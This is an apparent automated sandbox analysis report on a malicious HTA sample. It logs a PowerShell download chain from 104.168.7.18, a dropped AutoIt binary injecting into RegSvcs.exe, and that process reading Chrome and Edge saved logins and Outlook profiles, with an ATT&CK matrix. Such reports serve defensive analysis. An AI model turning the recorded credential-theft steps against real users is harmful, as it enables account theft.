                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E84E87 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,12_2_00E84E87
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E91E06 GetUserNameW,12_2_00E91E06
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E83F3A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,12_2_00E83F3A
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00E549A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,12_2_00E549A0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: hkcmd.exeBinary or memory string: WIN_81
                    Source: hkcmd.exeBinary or memory string: WIN_XP
                    Source: hkcmd.exeBinary or memory string: WIN_XPe
                    Source: hkcmd.exeBinary or memory string: WIN_VISTA
                    Source: hkcmd.exeBinary or memory string: WIN_7
                    Source: hkcmd.exeBinary or memory string: WIN_8
                    Source: hkcmd[1].exe.3.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 0USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2452508596.00000000024C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: Yara matchFile source: 13.2.RegSvcs.exe.160000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.hkcmd.exe.dc0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000D.00000002.2449579655.0000000000162000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.1321063131.0000000000DC0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: hkcmd.exe PID: 7560, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7604, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC6283 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,12_2_00EC6283
                    Source: C:\Users\user\AppData\Roaming\hkcmd.exeCode function: 12_2_00EC6747 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,12_2_00EC6747
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire Infrastructure2
                    Valid Accounts
                    12
                    Native API
                    1
                    DLL Side-Loading
                    1
                    Exploitation for Privilege Escalation
                    11
                    Disable or Modify Tools
                    1
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts11
                    Command and Scripting Interpreter
                    2
                    Valid Accounts
                    1
                    DLL Side-Loading
                    11
                    Deobfuscate/Decode Files or Information
                    121
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    11
                    Encrypted Channel
                    Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts3
                    PowerShell
                    Logon Script (Windows)2
                    Valid Accounts
                    3
                    Obfuscated Files or Information
                    Security Account Manager2
                    File and Directory Discovery
                    SMB/Windows Admin Shares11
                    Email Collection
                    2
                    Non-Application Layer Protocol
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                    Access Token Manipulation
                    1
                    DLL Side-Loading
                    NTDS128
                    System Information Discovery
                    Distributed Component Object Model121
                    Input Capture
                    23
                    Application Layer Protocol
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                    Process Injection
                    1
                    Masquerading
                    LSA Secrets231
                    Security Software Discovery
                    SSH3
                    Clipboard Data
                    Fallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts2
                    Valid Accounts
                    Cached Domain Credentials21
                    Virtualization/Sandbox Evasion
                    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
                    Virtualization/Sandbox Evasion
                    DCSync3
                    Process Discovery
                    Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation
                    Proc Filesystem11
                    Application Window Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt212
                    Process Injection
                    /etc/passwd and /etc/shadow1
                    System Owner/User Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                    System Network Configuration Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1664069 Sample: shegivenmekissinglips.hta Startdate: 13/04/2025 Architecture: WINDOWS Score: 100 45 reallyfreegeoip.org 2->45 47 checkip.dyndns.org 2->47 49 checkip.dyndns.com 2->49 59 Suricata IDS alerts for network traffic 2->59 61 Found malware configuration 2->61 63 Malicious sample detected (through community Yara rule) 2->63 67 12 other signatures 2->67 10 mshta.exe 1 2->10         started        signatures3 65 Tries to detect the country of the analysis system (by using the IP) 45->65 process4 signatures5 77 Suspicious command line found 10->77 79 PowerShell case anomaly found 10->79 13 cmd.exe 1 10->13         started        process6 signatures7 81 Detected Cobalt Strike Beacon 13->81 83 Suspicious powershell command line found 13->83 85 PowerShell case anomaly found 13->85 16 powershell.exe 45 13->16         started        21 conhost.exe 13->21         started        process8 dnsIp9 43 104.168.7.18, 49716, 80 AS-COLOCROSSINGUS United States 16->43 35 C:\Users\user\AppData\Roaming\hkcmd.exe, PE32 16->35 dropped 37 C:\Users\user\AppData\Local\...\hkcmd[1].exe, PE32 16->37 dropped 39 C:\Users\user\AppData\...\sgkiriu3.cmdline, Unicode 16->39 dropped 55 Loading BitLocker PowerShell Module 16->55 57 Powershell drops PE file 16->57 23 hkcmd.exe 4 16->23         started        26 csc.exe 3 16->26         started        file10 signatures11 process12 file13 69 Multi AV Scanner detection for dropped file 23->69 71 Binary is likely a compiled AutoIt script file 23->71 73 Writes to foreign memory regions 23->73 75 2 other signatures 23->75 29 RegSvcs.exe 15 2 23->29         started        41 C:\Users\user\AppData\Local\...\sgkiriu3.dll, PE32 26->41 dropped 33 cvtres.exe 1 26->33         started        signatures14 process15 dnsIp16 51 checkip.dyndns.com 132.226.8.169, 49717, 80 UTMEMUS United States 29->51 53 reallyfreegeoip.org 104.21.32.1, 443, 49718 CLOUDFLARENETUS United States 29->53 87 Tries to steal Mail credentials (via file / registry access) 29->87 89 Tries to harvest and steal browser information (history, passwords, etc) 29->89 signatures17

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.